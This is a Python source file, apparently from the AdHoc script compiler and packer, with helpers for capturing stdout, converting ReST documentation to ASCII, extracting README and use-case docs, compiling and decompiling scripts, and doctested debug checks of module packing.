def hl_lvl(level=0): # |:fnc:|
    """Select the default headline renderer: 0=sub-section, 1=section, else chapter."""
    global hlr
    hlr = hlssr if level == 0 else (hlsr if level == 1 else hlcr)

hl_lvl(0)
# (progn (forward-line 1) (snip-insert-mode "py.f.single.quote" t) (insert "\n"))
# (progn (forward-line 1) (snip-insert-mode "py.f.remove.match" t) (insert "\n"))
# (progn (forward-line 1) (snip-insert-mode "py.f.printenv" t) (insert "\n"))
# (progn (forward-line 1) (snip-insert-mode "py.f.uname-s" t) (insert "\n"))
# (progn (forward-line 1) (snip-insert-mode "py.f.printe" t) (insert "\n"))
def printe(*args, **kwargs): # ||:fnc:||
    """printf to `sys.stderr` unless an explicit `file` is given."""
    if 'file' not in kwargs:
        kwargs['file'] = sys.stderr
    printf(*args, **kwargs)
# (progn (forward-line 1) (snip-insert-mode "py.f.dbg.squeeze" t) (insert "\n"))
# (progn (forward-line 1) (snip-insert-mode "py.f.dbg.indent" t) (insert "\n"))
# (progn (forward-line -1) (insert "\n") (snip-insert-mode "py.s.func" t) (backward-symbol-tag 2 "fillme" "::"))
# --------------------------------------------------
# |||:sec:||| UTILITIES
# --------------------------------------------------
def adhoc_dump_list(list_, max_wid=None): # ||:fnc:||
    """Debug helper: print each element of `list_`, truncated to `max_wid`."""
    if max_wid is None:
        max_wid = 78
    for indx, elt in enumerate(list_):
        preview = str(elt)
        if len(preview) > max_wid:
            preview = preview[:max_wid - 3] + ' ...'
        printf(sformat("{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
                       dbg_comm, dbg_twid, dbg_fwid, ':DBG:',
                       sformat('elt[{0}]', indx), repr(preview)))
def adhoc_dump_sections(sections, max_wid=None): # ||:fnc:||
    """Debug helper: print tag_split `sections`, bodies truncated to `max_wid`."""
    if max_wid is None:
        max_wid = 78
    for indx, section in enumerate(sections):
        preview = list(section)
        if len(preview[1]) > max_wid:
            preview[1] = preview[1][:max_wid - 3] + ' ...'
        printf(sformat("{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
                       dbg_comm, dbg_twid, dbg_fwid, ':DBG:',
                       sformat('section[{0}]', indx), strclean(preview)))
# @:adhoc_uncomment:@
# @:adhoc_template:@ -catch-stdout
def catch_stdout(): # ||:fnc:||
    """Install a string IO as `sys.stdout`.

    :returns: a state variable that is needed by
      :func:`restore_stdout` to retrieve the output as string.
    """
    previous_stdout = sys.stdout
    sink = _AdHocStringIO()
    sys.stdout = sink
    return (previous_stdout, sink)
def restore_stdout(state): # ||:fnc:||
    """Restore capturing `sys.stdout` and get captured output.

    :returns: captured output as string.
    :param state: state variable obtained from :func:`catch_stdout`.
    """
    previous_stdout, sink = state
    sys.stdout = previous_stdout
    captured = sink.getvalue()
    sink.close()
    return captured
# @:adhoc_template:@
# @:adhoc_uncomment:@
# @:adhoc_uncomment:@
# @:adhoc_template:@ -max-width-class
class mw_(object):
    """Column-width tracker: pass values through, remembering the widest."""
    mw = 0
    def __call__(self, col):
        width = len(col)
        if width > self.mw:
            self.mw = width
        return col
class mwg_(object):
    """Read-back companion for :class:`mw_`: calling it reports the
    maximum width the wrapped tracker has seen so far."""
    def __init__(self, mwo):
        # attribute name `mwo` is part of the public surface; keep it
        self.mwo = mwo
    def __call__(self):
        return self.mwo.mw
# mws = [mw_(), mw_()]
# mwg = [mwg_(mwo) for mwo in mws]
# @:adhoc_template:@
# @:adhoc_uncomment:@
# @:adhoc_template:@ -rst-to-ascii
# ReST prolog used by rst_to_ascii(..., header_footer=True): editor mode
# line plus the role definitions referenced in the documentation.
RST_HEADER = '''\
.. -*- mode: rst; coding: utf-8 -*-
.. role:: mod(strong)
.. role:: func(strong)
.. role:: class(strong)
.. role:: attr(strong)
.. role:: meth(strong)
'''

# ReST epilog appended by rst_to_ascii(..., header_footer=True): emacs
# ide/compile helper and file-local variables.
RST_FOOTER = '''
.. :ide: COMPILE: render reST as HTML
.. . (let* ((fp (buffer-file-name)) (fn (file-name-nondirectory fp))) (save-match-data (if (string-match-t "[.][^.]*$" fn) (setq fn (replace-match "" nil t fn)))) (let ((args (concat " " fp " | ws_rst2html.py --traceback --cloak-email-addresses | tee " fn ".html "))) (save-buffer) (compile (concat "PATH=\\".:$PATH\\"; cat " args))))
..
.. Local Variables:
.. mode: rst
.. snip-mode: rst
.. truncate-lines: t
.. symbol-tag-symbol-regexp: "[-0-9A-Za-z_#]\\\\([-0-9A-Za-z_. ]*[-0-9A-Za-z_]\\\\|\\\\)"
.. symbol-tag-auto-comment-mode: nil
.. symbol-tag-srx-is-safe-with-nil-delimiters: nil
.. End:
'''
def rst_to_ascii(string, header_footer=False): # ||:fnc:||
    '''Convert ReST documentation to ASCII.

    :returns: transformed string.
    :param string: ReST source.
    :param header_footer: if True, wrap the result in
        RST_HEADER/RST_FOOTER.

    Bug fix: the inline regex flags `(?m)`/`(?im)` were written at the
    *end* of the patterns, which Python >= 3.11 rejects with
    "global flags not at the start of the expression"; they are now at
    the start.
    '''
    # turn admonition directives into plain `note:`/`warning:` labels
    string = re.sub(
        '(?im)^\\s*[.][.]\\s*(note|warning|attention)::', '\\1:', string)
    # drop automodule directives together with their option block
    string = re.sub(
        '(?m)^\\s*[.][.]\\s*automodule::[^\\n]*\\n(\\s[^\\n]+\\n)*\\n',
        '', string + '\n\n')
    # remove remaining ReST comment/directive lines
    string = re.sub('(?m)^\\s*[.][.]([^.][^\\n]*|)\\n', '', string)
    # unescape asterisks
    string = re.sub('\\\\\\*', '*', string)
    # strip line-block markers
    string = re.sub('(?m)^(\\s*)\\|(\\s|$)', '\\1', string)
    if header_footer:
        string = ''.join((RST_HEADER, string, RST_FOOTER))
    # collapse runs of blank lines
    string = re.sub('\\n\\n\\n+', '\\n\\n', string)
    return string
# @:adhoc_template:@
# --------------------------------------------------
# |||:sec:||| SYMBOL-TAG TOOLS
# --------------------------------------------------
def compile_(files=None): # ||:fnc:||
    '''Compile files or standard input.

    :returns: concatenation of the compiled sources, each terminated
        by a newline.
    :param files: list of file names; None or an empty list means
        standard input ('-').
    '''
    if files is None:
        files = []
    if len(files) == 0:
        files.append('-')
    compiled_files = []
    for file_ in files:
        # bug fix: save a *copy* of sys.path -- the original saved an
        # alias, so restoring it kept the inserted directory and the
        # include dir leaked into sys.path permanently
        sv_sys_path = list(sys.path)
        file_dir = os.path.abspath(os.path.dirname(file_))
        sys.path.insert(0, file_dir)
        try:
            compiled_files.append(AdHoc().compileFile(file_))
        finally:
            # restore even if compilation raises
            sys.path = sv_sys_path
    return ''.join(
        c if c.endswith('\n') else ''.join((c, '\n'))
        for c in compiled_files)
# --------------------------------------------------
# |||:sec:||| TEST
# --------------------------------------------------
# tag symbols whose sections appear only in the documentation index
doc_index_rst_tag_symbols = ('adhoc_index_only',)

def tpl_hook_doc_index_rst(cls, section, tag, tag_arg): # ||:fnc:||
    """Template hook: strip index-only tag lines from `section`."""
    pattern = '|'.join(re.escape(sym) for sym in doc_index_rst_tag_symbols)
    return cls.section_tag_remove(section, pattern, is_re=True)
def tpl_hook_readme(cls, section, tag, tag_arg): # ||:fnc:||
    """Template hook: expand the contents marker and drop index-only sections."""
    expanded = section.replace('@@contents@@', 'contents::')
    pattern = '|'.join(re.escape(sym) for sym in doc_index_rst_tag_symbols)
    return cls.remove_sections(expanded, pattern, is_re=True)
def adhoc_rst_to_ascii(string): # ||:fnc:||
    '''Transform ReST documentation to ASCII.

    Runs the generic :func:`rst_to_ascii` pass, then rewrites the
    ``|@:|`` / ``|:@|`` substitution references back to literal
    ``@:`` / ``:@`` tag markers.

    Bug fix: the inline regex flag `(?m)` was written at the *end* of
    the first pattern, which Python >= 3.11 rejects; it is now at the
    start.
    '''
    string = rst_to_ascii(string)
    string = string.replace('|@:|\\\\? ', '@:')
    string = string.replace('\\\\? |:@|', ':@')
    string = string.replace('|@:|', '`@:`')
    string = string.replace('|:@|', '`:@`')
    string = re.sub('(?m)^:[|]_?(adhoc[^|]*)_?[|]([^:]*):', '@:\\1:@\\2', string)
    string = re.sub('[|]_?(adhoc[^|]*)_?[|]', '@:\\1:@', string)
    return string
def inc_template_marker(cls, as_template=False): # ||:fnc:||
    """Return an ``adhoc_template_v`` section marker line for `as_template`.

    :param cls: ignored (API symmetry; AdHoc class methods are used
        directly).
    :param as_template: template name appended to the marker.
        Bug fix: non-string values (including the default ``False``)
        are coerced with str() -- the original joined the raw value
        and raised TypeError for non-strings.
    """
    sv = AdHoc.inc_delimiters()
    template_tag = ''.join((
        '# ', AdHoc.section_tag('adhoc_template_v'),
        ' ', str(as_template), '\n'))
    AdHoc.reset_delimiters(sv)
    return template_tag
def get_readme(file_=None, source=None, as_template=False, transform=True): # ||:fnc:||
    """Extract the README text from the `doc/index.rst` template.

    :returns: README text (optionally wrapped as a template section).
    :param file_: source file name (forwarded to std_source_param).
    :param source: source string (forwarded to std_source_param).
    :param as_template: if set (a template name), wrap the result in
        ``adhoc_template_v`` markers and RST header/footer.
    :param transform: if True, convert the ReST text to ASCII.
    """
    file_, source = AdHoc.std_source_param(file_, source)
    template_name = 'doc/index.rst'
    # temporarily install the README-specific template hook, then
    # restore whatever was there before
    tpl_hooks = AdHoc.template_process_hooks
    AdHoc.template_process_hooks = {template_name: tpl_hook_readme}
    template = AdHoc.get_named_template(template_name, file_, source)
    AdHoc.template_process_hooks = tpl_hooks
    # append the module docstring and drop index-only sections
    template = template + '\n\n' + __doc__ + '\n'
    template = AdHoc.remove_sections(template, 'adhoc_index_only')
    if transform:
        template = adhoc_rst_to_ascii(template).strip() + '\n'
    if as_template:
        template_tag = inc_template_marker(AdHoc, as_template)
        output = []
        output.append(template_tag)
        output.append(RST_HEADER)
        output.append(template)
        output.append(RST_FOOTER)
        output.append(template_tag)
        template = ''.join(output)
    return template
import use_case_000_ as use_case # @:adhoc:@
def get_use_cases(as_template=None): # ||:fnc:||
    """Collect the ``--docu`` output of the use-case example scripts.

    :returns: concatenated documentation of use cases 000-005.
    :param as_template: if not None, wrap the output in
        ``adhoc_template_v`` markers named `as_template`.

    .. note:: the ``# @:adhoc:@`` tags on the imports below are
       processed by the AdHoc compiler itself; keep them intact.
    """
    output = []
    if as_template is not None:
        template_tag = inc_template_marker(AdHoc, as_template)
    else:
        template_tag = ''
    output.append(template_tag)
    # each use case prints its documentation to stdout; capture it
    import use_case_000_ as use_case
    state = catch_stdout()
    use_case.main('script --docu'.split())
    output.append(restore_stdout(state))
    import use_case_001_templates_ as use_case # @:adhoc:@
    state = catch_stdout()
    use_case.main('script --docu'.split())
    output.append(restore_stdout(state))
    import use_case_002_include_ as use_case # @:adhoc:@
    state = catch_stdout()
    use_case.main('script --docu'.split())
    output.append(restore_stdout(state))
    import use_case_003_import_ as use_case # @:adhoc:@
    state = catch_stdout()
    use_case.main('script --docu'.split())
    output.append(restore_stdout(state))
    import use_case_005_nested_ as use_case # @:adhoc:@
    state = catch_stdout()
    use_case.main('script --docu'.split())
    output.append(restore_stdout(state))
    output.append(template_tag)
    output = ''.join(output)
    return output
# --------------------------------------------------
# |||:sec:||| TEST
# --------------------------------------------------
def adhoc_run_time_module(): # ||:fnc:|| |:todo:| experimental
    """Set up an ``adhoc`` module with an ``adhoc.rt`` run-time alias.

    Experimental. If an ``adhoc`` module is not already registered,
    create one from this file's source and execute it; then attach an
    empty ``adhoc.rt`` submodule object.

    Bug fixes: ``exec()`` requires a dict for its globals -- the
    original passed the module object itself (TypeError); and
    ``imp.new_module`` (``imp`` was removed in Python 3.12) is replaced
    by ``types.ModuleType``.
    """
    import types
    if 'adhoc.rt' in sys.modules:
        return
    file_ = __file__
    source = None
    exec_ = False
    if file_.endswith('.pyc'):
        file_ = file_[:-1]
    if 'adhoc' in sys.modules:
        adhoc = sys.modules['adhoc']
    else:
        adhoc = types.ModuleType('adhoc')
        setattr(adhoc, '__file__', file_)
        sys.modules['adhoc'] = adhoc
        exec_ = True
    if not hasattr(adhoc, '__adhoc__'):
        __adhoc__ = {}
        adhoc.__adhoc__ = __adhoc__
    if 'source' not in adhoc.__adhoc__:
        adhoc.__adhoc__['source'] = AdHoc.read_source(file_)
    if exec_:
        source = AdHoc.encode_source(adhoc.__adhoc__['source'])
        # exec() needs a dict for globals; the module object itself
        # raised TypeError in the original
        exec(source, adhoc.__dict__)
    RT = types.ModuleType('adhoc.rt')
    setattr(adhoc, 'rt', RT)
import adhoc_test.sub # @:adhoc:@ force
def adhoc_check_modules(): # ||:fnc:||
    """Debug helper: report the import state of the adhoc_test package.

    The printed text is part of the output contract checked by doctests
    elsewhere in this file -- do not change the message strings.
    """
    hl_lvl(0)
    hlc('adhoc_check_modules')
    printf(sformat('{0}--------------------------------------------------',
                   dbg_comm))
    # adhoc_test.sub was imported at module level; record whether the
    # parent package is visible before/after
    msg = ((('adhoc_test' in sys.modules) and ('SEEN')) or ('NOT SEEN'))
    printf(sformat("{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
                   dbg_comm, dbg_twid, dbg_fwid, ':DBG:',
                   'PRE sub import', 'adhoc_test ' + msg))
    msg = ((('adhoc_test' in sys.modules) and ('SEEN')) or ('NOT SEEN'))
    printf(sformat("{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
                   dbg_comm, dbg_twid, dbg_fwid, ':DBG:',
                   'POST sub import', 'adhoc_test ' + msg))
    printf(sformat("{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
                   dbg_comm, dbg_twid, dbg_fwid, ':DBG:',
                   'dir(adhoc_test.sub)', dir(adhoc_test.sub)))
    printf(sformat("{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
                   dbg_comm, dbg_twid, dbg_fwid, ':DBG:',
                   'adhoc_test.sub.__file__', adhoc_test.sub.__file__))
    if 'adhoc_test' in sys.modules:
        printf(sformat("{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
                       dbg_comm, dbg_twid, dbg_fwid, ':DBG:',
                       'dir(adhoc_test)[auto]', dir(adhoc_test)))
    printf(sformat('{0}--------------------------------------------------',
                   dbg_comm))
    # the @:adhoc:@ tag below is processed by the AdHoc compiler
    import adhoc_test # @:adhoc:@
    printf(sformat("{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
                   dbg_comm, dbg_twid, dbg_fwid, ':DBG:',
                   'dir(adhoc_test)', dir(adhoc_test)))
    printf(sformat("{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
                   dbg_comm, dbg_twid, dbg_fwid, ':DBG:',
                   'adhoc_test.__file__', adhoc_test.__file__))
    if hasattr(adhoc_test, '__path__'):
        printf(sformat("{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
                       dbg_comm, dbg_twid, dbg_fwid, ':DBG:',
                       'adhoc_test.__path__', adhoc_test.__path__))
def adhoc_check_module_setup(): # ||:fnc:||
    '''
    >>> state = catch_stdout()
    >>> adhoc_check_module_setup()
    >>> contents = restore_stdout(state)
    >>> contents = re.sub('(mtime.*\\])[^[]*(\\[)', r'\\1\\2', contents)
    >>> contents = re.sub(' at 0x([0-9a-f]+)', '', contents)
    >>> contents = re.sub(r'adhoc\\.pyc', 'adhoc.py', contents)
    >>> contents = '\\n'.join([l.strip() for l in contents.splitlines()])
    .. >>> ign = open('adhoc_check_module_setup.t', 'w').write(
    .. ...     re.sub('^(?m)', '    ', contents)
    .. ...     .replace('\\\\', '\\\\\\\\') + '\\n')
    .. @:adhoc_expected:@ adhoc_check_module_setup.e
    >>> printf(contents, end='') #doctest: +ELLIPSIS
    # --------------------------------------------------
    # |||:CHP:||| adhoc_check_module_setup
    # --------------------------------------------------
    # -----------------------------------
    # ||:SEC:|| no:module:found
    # -----------------------------------
    # :DBG: module : ]['__adhoc__', '__doc__', '__name__'...][
    # ------------------------------
    # :DBG: __adhoc__ : ]...
    # :DBG: __doc__ : ]None[
    ...
    # --------------------
    # |:INF:| no:module:found.__adhoc__
    # --------------------
    # :DBG: __adhoc__ : ]...
    # ------------------------------
    # :DBG: __module__ : ]<module 'no:module:found' (built-in)>[
    # :DBG: mode : ]...[
    # :DBG: mtime : ][
    # -----------------------------------
    # ||:SEC:|| adhoc_test.sub
    # -----------------------------------
    # :DBG: module : ]['ADHOC_TEST_SUB_IMPORTED',...
    # ------------------------------
    # :DBG: ADHOC_TEST_SUB_IMPORTED: ]True[
    # :DBG: __adhoc__ : ]...
    ...
    # :DBG: __doc__ : ]None[
    # :DBG: __file__ : ]...adhoc_test/sub/__init__.py...[
    ...
    # --------------------
    # |:INF:| adhoc_test.sub.__adhoc__
    # --------------------
    # :DBG: __adhoc__ : ]...
    # ------------------------------
    # :DBG: __module__ : ]<module 'adhoc_test.sub' from...
    ...
    # :DBG: source : ]...# -*- coding: utf-8 -*-\\n\\nADHOC_TEST_SUB_IMPORTED = True\\n...[
    # -----------------------------------
    # ||:SEC:|| adhoc
    # -----------------------------------
    # :DBG: adhoc : ]...
    # ------------------------------
    # :DBG: AH_CHECK_SOURCE : ]...
    ...
    # :DBG: AdHoc : ]<class 'adhoc.AdHoc'>[
    # :DBG: AdHocError : ]...adhoc.AdHocError...[
    ...
    # :DBG: RST_HEADER : ]...
    ...
    # :DBG: __adhoc__ : ]...
    ...
    # :DBG: __file__ : ].../adhoc.py...[
    # :DBG: __name__ : ]adhoc[
    ...
    # :DBG: _nativestr : ]<function _nativestr>[
    # :DBG: _quiet : ]False[
    # :DBG: _uc : ]<function ...>[
    # :DBG: _utf8str : ]<function _utf8str>[
    # :DBG: _verbose : ]False[
    # :DBG: adhoc_check_encode_module: ]<function adhoc_check_encode_module>[
    # :DBG: adhoc_check_module_setup : ]<function adhoc_check_module_setup>[
    # :DBG: adhoc_check_modules : ]<function adhoc_check_modules>[
    # :DBG: adhoc_check_packing : ]<function adhoc_check_packing>[
    # :DBG: adhoc_dump_list : ]<function adhoc_dump_list>[
    # :DBG: adhoc_dump_sections : ]<function adhoc_dump_sections>[
    # :DBG: adhoc_rst_to_ascii : ]<function adhoc_rst_to_ascii>[
    # :DBG: adhoc_run_time_module : ]<function adhoc_run_time_module>[
    # :DBG: adhoc_test : ]<module 'adhoc_test' from '...adhoc_test/__init__.py...'>[
    # :DBG: base64 : ]<module 'base64' from '.../base64.py...'>[
    # :DBG: catch_stdout : ]<function catch_stdout>[
    # :DBG: compile_ : ]<function compile_>[
    # :DBG: dbg_comm : ]# [
    # :DBG: dbg_fwid : ]23[
    # :DBG: dbg_twid : ]9[
    # :DBG: dict_dump : ]<function dict_dump>[
    # :DBG: ditems : ]<function <lambda>>[
    # :DBG: dkeys : ]<function <lambda>>[
    # :DBG: doc_index_rst_tag_symbols: ]('adhoc_index_only',)[
    # :DBG: dump_attr : ]<function dump_attr>[
    # :DBG: dvalues : ]<function <lambda>>[
    # :DBG: file_encoding_is_clean : ]True[
    # :DBG: get_readme : ]<function get_readme>[
    # :DBG: get_use_cases : ]<function get_use_cases>[
    # :DBG: hl : ]<function hl>[
    # :DBG: hl_lvl : ]<function hl_lvl>[
    # :DBG: hlc : ]<function hlc>[
    # :DBG: hlcr : ]<function hlcr>[
    # :DBG: hlr : ]<function hlssr>[
    # :DBG: hls : ]<function hls>[
    # :DBG: hlsr : ]<function hlsr>[
    # :DBG: hlss : ]<function hlss>[
    # :DBG: hlssr : ]<function hlssr>[
    # :DBG: inc_template_marker : ]<function inc_template_marker>[
    # :DBG: isstring : ]<function isstring>[
    # :DBG: main : ]<function main>[
    # :DBG: mw_ : ]<class 'adhoc.mw_'>[
    # :DBG: mwg_ : ]<class 'adhoc.mwg_'>[
    # :DBG: namespace_dict : ]<module 'namespace_dict' from '...namespace_dict.py...'>[
    # :DBG: nativestr : ]<function nativestr>[
    # :DBG: os : ]<module 'os' from '.../os.py...'>[
    # :DBG: printe : ]<function printe>[
    # :DBG: printf : ]<...function print...>[
    # :DBG: re : ]<module 're' from '.../re.py...'>[
    # :DBG: restore_stdout : ]<function restore_stdout>[
    # :DBG: rst_to_ascii : ]<function rst_to_ascii>[
    # :DBG: run : ]<function run>[
    # :DBG: setdefaultencoding : ]<function setdefaultencoding>[
    # :DBG: sformat : ]<function sformat>[
    ...
    # :DBG: sys : ]<module 'sys' (built-in)>[
    # :DBG: tpl_hook_doc_index_rst : ]<function tpl_hook_doc_index_rst>[
    # :DBG: tpl_hook_readme : ]<function tpl_hook_readme>[
    # :DBG: uc : ]<function uc>[
    # :DBG: uc_type : ]<...>[
    # :DBG: urllib : ]<module 'urllib' from '.../urllib...'>[
    # :DBG: utf8str : ]<function utf8str>[
    # --------------------
    # |:INF:| adhoc.__adhoc__
    # --------------------
    # :DBG: __adhoc__ : ]...
    # ------------------------------
    # :DBG: __module__ : ]<module 'adhoc' from '.../adhoc.py...'>[
    # :DBG: mode : ]...[
    # :DBG: mtime : ][
    # :DBG: source : ]#!...python...\\n# -*- coding: utf-8 -*-\\n# Copyright (C)...
    ...
    .. @:adhoc_expected:@ adhoc_check_module_setup.e
    .. \\|:here:|
    '''
    # :ide-menu: Emacs IDE Menu - Buffer @BUFFER@
    # . M-x `eIDE-menu' ()(eIDE-menu "z")
    # also remove __builtins__, _AdHocStringIO ...
    # (progn
    #  (goto-char point-min) (replace-string "/home/ws/project/ws-util/adhoc" "..." nil (if (and transient-mark-mode mark-active) (region-beginning)) (if (and transient-mark-mode mark-active) (region-end)))
    #  (goto-char point-min) (replace-string "/home/ws/project/ws-util/lib/python" "..." nil (if (and transient-mark-mode mark-active) (region-beginning)) (if (and transient-mark-mode mark-active) (region-end)))
    #  (goto-char point-min) (replace-string "/home/ws/project/ws-util" "..." nil (if (and transient-mark-mode mark-active) (region-beginning)) (if (and transient-mark-mode mark-active) (region-end)))
    #  (goto-char point-min) (replace-string ".pyc" ".py" nil (if (and transient-mark-mode mark-active) (region-beginning)) (if (and transient-mark-mode mark-active) (region-end)))
    #  (goto-char point-min) (replace-string ".py" ".py..." nil (if (and transient-mark-mode mark-active) (region-beginning)) (if (and transient-mark-mode mark-active) (region-end)))
    #  (goto-char point-min) (replace-string ".../urllib.py..." ".../urllib..." nil (if (and transient-mark-mode mark-active) (region-beginning)) (if (and transient-mark-mode mark-active) (region-end)))
    #  (goto-char point-min) (replace-string "/usr/lib/python2.7" "..." nil (if (and transient-mark-mode mark-active) (region-beginning)) (if (and transient-mark-mode mark-active) (region-end)))
    #  (goto-char point-min) (replace-string-regexp "# :DBG: __adhoc__\\( *\\): \\].*" "# :DBG: __adhoc__\\1: ]..." nil (if (and transient-mark-mode mark-active) (region-beginning)) (if (and transient-mark-mode mark-active) (region-end)))
    #  (goto-char point-min) (replace-string-regexp "# :DBG: adhoc\\( *\\): \\].*" "# :DBG: adhoc\\1: ]..." nil (if (and transient-mark-mode mark-active) (region-beginning)) (if (and transient-mark-mode mark-active) (region-end)))
    #  (goto-char point-min) (replace-string-regexp "# :DBG: module : ..'ADHOC_TEST_SUB_IMPORTED',.*" "# :DBG: module : ]['ADHOC_TEST_SUB_IMPORTED',..." nil (if (and transient-mark-mode mark-active) (region-beginning)) (if (and transient-mark-mode mark-active) (region-end)))
    #  (goto-char point-min) (replace-string "<function _uc>" "<function ...>" nil (if (and transient-mark-mode mark-active) (region-beginning)) (if (and transient-mark-mode mark-active) (region-end)))
    #  (goto-char point-min) (replace-string "<type 'unicode'>" "<...>" nil (if (and transient-mark-mode mark-active) (region-beginning)) (if (and transient-mark-mode mark-active) (region-end)))
    #  (goto-char point-min)
    #  (goto-char point-min)
    #  (goto-char point-min)
    #  )
    # NOTE: the doctest above checks the exact (whitespace-normalized)
    # output of the code below; keep statement order and debug strings
    # in sync with the expected output when editing.
    # wid/trunc limit how much of each attribute value dump_attr() shows.
    wid = 100
    trunc = 10
    hl_lvl(0)
    hlc('adhoc_check_module_setup')
    # 1) a dummy module created from scratch by AdHoc.module_setup()
    mod_name = 'no:module:found'
    hls(mod_name)
    module = AdHoc.module_setup('no:module:found')
    printf(sformat("{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
                   dbg_comm, dbg_twid, dbg_fwid, ':DBG:',
                   'module', str(dir(module))[:wid]))
    dump_attr(module, wid=wid, trunc=trunc)
    hl(sformat('{0}.__adhoc__',mod_name))
    printf(sformat("{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
                   dbg_comm, dbg_twid, dbg_fwid, ':DBG:',
                   '__adhoc__', str(dir(module.__adhoc__))[:wid]))
    dump_attr(module.__adhoc__, wid=wid, trunc=trunc)
    # 2) a real imported package module, post-processed by module_setup()
    hls('adhoc_test.sub')
    import adhoc_test.sub # @:adhoc:@
    module = AdHoc.module_setup('adhoc_test.sub')
    printf(sformat("{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
                   dbg_comm, dbg_twid, dbg_fwid, ':DBG:',
                   'module', str(dir(module))[:wid]))
    dump_attr(module, wid=wid, trunc=trunc)
    hl('adhoc_test.sub.__adhoc__')
    printf(sformat("{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
                   dbg_comm, dbg_twid, dbg_fwid, ':DBG:',
                   '__adhoc__', str(dir(module.__adhoc__))[:wid]))
    dump_attr(module.__adhoc__, wid=wid, trunc=trunc)
    # 3) this script itself, when importable as `adhoc`; skipped when the
    #    module is not on the path (e.g. running the compiled script).
    try:
        import adhoc
        hls('adhoc')
        module = AdHoc.module_setup('adhoc')
        printf(sformat("{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
                       dbg_comm, dbg_twid, dbg_fwid, ':DBG:',
                       'adhoc', str(dir(module))[:wid]))
        dump_attr(module, wid=wid, trunc=trunc)
        hl('adhoc.__adhoc__')
        printf(sformat("{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
                       dbg_comm, dbg_twid, dbg_fwid, ':DBG:',
                       '__adhoc__', str(dir(module.__adhoc__))[:wid]))
        dump_attr(module.__adhoc__, wid=wid, trunc=trunc)
    except ImportError:
        pass
def adhoc_check_encode_module(): # ||:fnc:||
    """Debug helper: exercise :meth:`AdHoc.encode_module`.

    Shows the first lines of the run-time section import spec, encodes a
    synthetic module and a real one, prints the head of each encoding and
    finally exec()s the last encoded module import.
    """
    hl_lvl(0)
    hlc('adhoc_check_encode_module')
    # called only for its side effect of registering the dummy module;
    # the returned module object is not needed here
    AdHoc.module_setup('no:module:found')
    hl('IMPORT SPEC')
    ahc = AdHoc()
    import_spec = '\n'.join(ahc.run_time_section.splitlines()[:5])
    printf(sformat("{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
                   dbg_comm, dbg_twid, dbg_fwid, ':DBG:',
                   'ahc.run_time_section', import_spec))
    for_ = None
    # encode a synthetic module and a real one; same debug output as the
    # previous unrolled version
    for module_name in ('no:module:found', 'ws_sql_tools'):
        module_import = ahc.encode_module(module_name, for_)
        printf(sformat("{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
                       dbg_comm, dbg_twid, dbg_fwid, ':DBG:',
                       'module_import',
                       '\n'.join(module_import.splitlines()[:5])))
    hl('EXECUTE')
    # executes the last encoding (ws_sql_tools), as before
    exec(module_import)
def adhoc_check_packing(): # ||:fnc:||
    """
    >>> source = AdHoc.read_source(__file__)
    >>> AdHoc.write_source('write-check', source)
    >>> rsource = AdHoc.read_source('write-check')
    >>> os.unlink('write-check')
    >>> (source == rsource)
    True
    >>> psource = AdHoc.pack_file(source, zipped=False)
    >>> usource = AdHoc.unpack_file(psource, zipped=False)
    >>> (source == usource)
    True
    >>> psource = AdHoc.pack_file(source, zipped=True)
    >>> usource = AdHoc.unpack_file(psource, zipped=True)
    >>> (source == usource)
    True
    """
    # Intentionally empty: this function only hosts the round-trip
    # doctests above (read/write, pack/unpack), run via the --test option.
def run(parameters, pass_opts): # ||:fnc:||
    """Application runner, when called as __main__.

    Dispatches --compile / --decompile; the remainder of the body is
    development/debug code wrapped in adhoc_disable/adhoc_remove tag
    sections, which the AdHoc compiler comments out or strips when the
    script is compiled.  `pass_opts` holds unrecognized options from
    parse_known_args() and is currently unused here.
    """
    # (progn (forward-line 1) (snip-insert-mode "py.bf.sql.ws" t) (insert "\n"))
    # (progn (forward-line 1) (snip-insert-mode "py.bf.file.arg.loop" t) (insert "\n"))
    # NOTE(review): the space in `@: adhoc_enable:@` presumably neuters the
    # tag so this already-enabled section is not re-processed -- confirm
    # against the AdHoc tag scanner before normalizing it.
    # @: adhoc_enable:@
    if not (parameters.compile or parameters.decompile):
        parameters.compile = True
    # @: adhoc_enable:@
    if not parameters.args:
        parameters.args = '-'
    if _debug:
        printe(sformat(
            "{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
            dbg_comm, dbg_twid, dbg_fwid, ':DBG:', 'parameters.args', parameters.args))
    # |:here:|
    # --compile: compile input file(s) and write result to --output or stdout
    if parameters.compile:
        output = parameters.output
        if _verbose:
            printe(sformat(
                "{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
                dbg_comm, dbg_twid, dbg_fwid, ':INF:', 'output', output))
        if output is None:
            output = '-'
        compiled = compile_(parameters.args)
        if _debug:
            printe(sformat(
                "{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
                dbg_comm, dbg_twid, dbg_fwid, ':DBG:', 'compiled', compiled))
        AdHoc.write_source(output, compiled)
        return
    # --decompile: export packed files from compiled script(s) into --output dir
    if parameters.decompile:
        AdHoc.default_engine = True
        export_dir = parameters.output
        if export_dir is not None:
            AdHoc.export_dir = export_dir
        if _verbose:
            printe(sformat(
                "{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
                dbg_comm, dbg_twid, dbg_fwid, ':INF:', 'export_dir', export_dir))
        for file_ in parameters.args:
            AdHoc.export(file_)
        return
    # |:here:|
    # development/debug code below; stripped or disabled on compile
    # @:adhoc_disable:@ -development_tests
    # map a compiled .pyc path back to its .py source file
    myfile = __file__
    if myfile.endswith('.pyc'):
        myfile = myfile[:-1]
